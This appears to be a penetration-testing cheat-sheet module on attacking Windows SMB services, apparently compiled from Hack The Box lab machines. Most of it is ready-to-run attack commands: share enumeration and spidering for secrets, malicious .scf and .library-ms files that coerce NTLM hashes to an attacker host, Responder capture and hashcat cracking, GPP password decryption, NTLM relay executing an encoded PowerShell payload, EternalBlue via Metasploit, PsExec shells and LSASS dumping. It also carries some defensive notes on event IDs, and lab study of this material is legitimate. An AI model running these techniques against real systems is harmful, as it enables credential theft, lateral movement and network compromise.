Back to All Modules

SMB Exploitation

#Overview

Server Message Block (SMB) on port 445 (and legacy 139) is the primary file-sharing protocol in Windows environments and the most frequently exploited network service. SMB exploitation encompasses anonymous share enumeration, credential theft via malicious files (SCF, LNK, library-ms), Group Policy Preferences password decryption, NTLM relay attacks, and patch-level exploits such as EternalBlue. With valid credentials, SMB enables lateral movement through service creation (PsExec) and command execution.

#Prerequisites

  • smbclient, smbmap, netexec (crackmapexec)
  • impacket suite (smbclient.py, psexec.py, smbexec.py, GetNPUsers.py)
  • responder (for hash capture)
  • ntl_theft (for malicious file generation)
  • enum4linux for comprehensive enumeration

#Detection & Enumeration

#SMB Share Enumeration

# Anonymous / Guest access
smbclient -L //<IP>/                               # List shares (null session)
smbmap -H <IP>                                     # Check share permissions
smbmap -u guest -H <IP>                            # Guest account
crackmapexec smb <IP> --shares                     # List shares with current creds

# Authenticated
smbmap -H <IP> -u <user> -p '<password>'           # Authenticated share listing
smbclient -U '<user>%<password>' //<IP>/<share>    # Connect to specific share
crackmapexec smb <IP> -u <user> -p '<pass>' --shares  # Share details
BASH

#Recursive Share Download

smbclient //10.10.10.100/Replication -N
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *                                     # Download entire share recursively
BASH

#Share Spidering for Sensitive Files

crackmapexec smb <IP> -u <user> -p '<pass>' -M spider_plus  # Spider all accessible shares
crackmapexec smb <IP> --spider-shares              # Quick spider check
BASH

#SMB Signing Check

SMB signing disabled enables NTLM relay attacks:

crackmapexec smb <IP>/24 --gen-relay-list relay.txt  # Find hosts without SMB signing
BASH

#Password Policy & User Enumeration

crackmapexec smb <IP> --pass-pol                   # Password policy
crackmapexec smb <IP> -u <user> -p '<pass>' --users  # Enumerate domain users
BASH

#Exploitation / Execution

#1. Anonymous/Guest Access to Shares

smbclient -N //<IP>/<share>                        # Connect anonymously
smbmap -u guest -H <IP>                            # Guest enumeration
BASH

Enumerate accessible shares and recursively download interesting files (backups, configs, registry dumps, credentials).

#2. Password Capture via Malicious Files

Malicious .scf File (Icon Path Coercion)

Place in a writable SMB share. When a user browses the folder, Windows attempts to load the icon from the attacker's IP, sending NetNTLMv2:

# File: malicious.scf
[Shell]
Command=2
IconFile=\\<LHOST>\share\icon.ico
[Taskbar]
Command=ToggleDesktop
TEXT
responder -I tun0 -v                                # Start Responder to capture hash
smbclient //<IP>/<share> -U <user>
smb: \> put malicious.scf                           # Upload SCF file
BASH

Malicious .lnk File (Icon Path Coercion)

Similar coercion but uses .lnk shortcut files with an attacker-controlled icon path.

Malicious .library-ms File (CVE-2025-24071)

Exploits Windows File Explorer spoofing. Extract triggers NTLM authentication:

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
# Enter file name, attacker IP
smbclient '//<IP>/<share>' -U '<user>%<pass>'
smb: \> put exploit.zip
# Capture hash with Responder
responder -I tun0
BASH

ntl_theft (Automated File Generation)

Generates many file types to trigger NTLM authentication:

git clone https://github.com/Greenwolf/ntlm_theft
cd ./ntlm_theft
python3 ntlm_theft.py --generate all --server <LHOST> --filename htb
# Upload BROWSE TO FOLDER files to writable share
BASH

Crack captured hashes:

john hash --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt   # Mode 5600 = NetNTLMv2
BASH

#3. GPP Password Extraction (Groups.xml)

Group Policy Preferences stored cleartext passwords encrypted with a publicly known AES key:

smbclient //<IP>/SYSVOL -N
# Navigate to: Policies/{GUID}/MACHINE/Preferences/Groups/Groups.xml
# Extract cpassword attribute
gpp-decrypt <cpassword_value>                      # Decrypt the password
BASH

The decrypted password from Active's cpassword edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ yields GPPstillStandingStrong2k18.

#4. SMB Signing Disabled -- NTLM Relay

When SMB signing is disabled, relay captured NTLM authentication to other hosts:

crackmapexec smb 10.10.10.0/24 --gen-relay-list relay.txt
impacket-ntlmrelayx -tf relay.txt -smb2support -c "powershell -e <base64_payload>"
BASH

#5. SMBv1 Vulnerabilities (EternalBlue)

CVE-2017-0144 (MS17-010 / EternalBlue) targets SMBv1:

nmap -p 445 --script smb-vuln-ms17-010 <IP>         # Check vulnerability
# Metasploit
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP>
set LHOST <LHOST>
run
BASH

Also test for SMBGhost (CVE-2020-0796) on newer Windows 10 systems.

#6. PSExec / SMBExec with Credentials

impacket-psexec.py <domain>/<user>:<pass>@<IP>                     # PTH service-based shell
impacket-psexec.py <domain>/<user>@<IP> -hashes :<NTLM_hash>
impacket-smbexec.py <domain>/<user>:<pass>@<IP>                    # Named pipe semi-shell
impacket-wmiexec.py <domain>/<user>:<pass>@<IP>                    # WMI-based shell
BASH
  • PsExec: Creates a service (ADMIN$ share) and writes a binary. Triggers Event 7045.
  • SMBExec: Uses named pipes. Fewer artifacts but less stable.
  • WMIExec: Uses WMI. No service creation, fewer artifacts.

#7. SMB Share Spidering Workflow

# Mount the share
mount -t cifs //<IP>/<share> /mnt/smb -o username=<user>,password=<pass>
# Find interesting files
find /mnt/smb -name "*.xml" -o -name "*.config" -o -name "*.kdbx" -o -name "*.zip" -o -name "*.pfx" -o -name "*.reg" -o -name "*.bak" 2>/dev/null
grep -rni "password\|secret\|credential\|connectionstring" /mnt/smb/ 2>/dev/null
BASH

#8. netexec Modules for SMB

netexec smb <IP> -u <user> -p <pass> --shares       # Share enumeration
netexec smb <IP> -u <user> -p <pass> --spider-shares # Spider file names
netexec smb <IP> -u <user> -p <pass> --pass-pol      # Password policy
netexec smb <IP> -u <user> -p <pass> --users          # User enumeration
netexec smb <IP> -u <user> -p <pass> --groups         # Group enumeration
netexec smb <IP> -u <user> -p <pass> --local-groups   # Local group members
netexec smb <IP> -u <user> -p <pass> -M loggedon-users # Logged on users
netexec smb <IP> -u <user> -p <pass> -M lsassy         # Dump LSASS via parsing
BASH

#9. SCF + LNK Combination Attack Strategy

  1. Gain write access to any SMB share (even guest-writable).
  2. Deploy .scf, .lnk, .library-ms, desktop.ini files pointing to attacker's IP.
  3. Run Responder on attacker machine: responder -I tun0 -v.
  4. Wait for users to browse the share (via login scripts, mapped drives, manual access).
  5. Crack captured NetNTLMv2 hashes: hashcat -m 5600 hash wordlist.txt.
  6. Use cracked credentials to escalate access to additional shares or WinRM.

#Common Pitfalls

  • Warning: SMB signing is enabled by default on modern Windows Server -- verify with crackmapexec smb <IP> before attempting relay
  • Warning: Some shares allow read but restrict file extensions (e.g., only .ini allowed for Flight)
  • Warning: Responder must be on the same network segment for LLMNR/NBT-NS poisoning, but SMB coercion via UNC paths works across segments
  • Warning: PsExec creates a named service that may trigger antivirus or EDR

#OPSEC Considerations

  • Shield: SMB share enumeration generates Event ID 5140 (network share access) and 5145 (share object access)
  • Shield: PsExec service creation generates Event ID 7045 (new service installed)
  • Shield: Responder is noisy and generates significant LLMNR/NBT-NS traffic; use Analyze mode first
  • Shield: Recursive SMB downloads generate high volume of file access events

#Post-Exploitation Value

  • Password policy enumeration enables informed brute-force strategies
  • User enumeration provides targets for Kerberoasting, ASREPRoasting, and password spraying
  • GPP passwords directly compromise domain accounts
  • Malicious SCF/LNK files capture credentials of users who access the share
  • Sensitive file discovery yields configuration files, backups, and credential artifacts
  • LSASS dumps via lsassy provide NTLM hashes for PTH

#Cross-References

#Tool References

ToolLink
netexechttps://github.com/Porchetta-Industries/CrackMapExec
smbmaphttps://github.com/ShawnDEvans/smbmap
impackethttps://github.com/fortra/impacket
responderhttps://github.com/lgandx/Responder
ntl_thefthttps://github.com/Greenwolf/ntlm_theft
gpp-decryptBuilt-in (Kali) / https://github.com/t0thkr1s/gpp-decrypt

#Source Machines

  • Active (Easy, AD) - GPP password extraction from Replication share
  • Blackfield (Hard, AD) - Anonymous SMB enumeration for user discovery
  • Cascade (Medium, AD) - SMB share enumeration for VNC registry backup
  • Escape (Medium, AD) - Anonymous SMB access to Public share with PDF credentials
  • Flight (Hard, AD) - SMB share write access for SCF/LNK hash capture
  • Fluffy (Easy, AD) - SMB share for CVE-2025-24071 hash capture
  • Return (Easy, AD) - SMB enumeration for domain discovery
  • Support (Easy, AD) - SMB share with executable analysis
  • Timelapse (Easy, AD) - SMB share with password-protected PFX file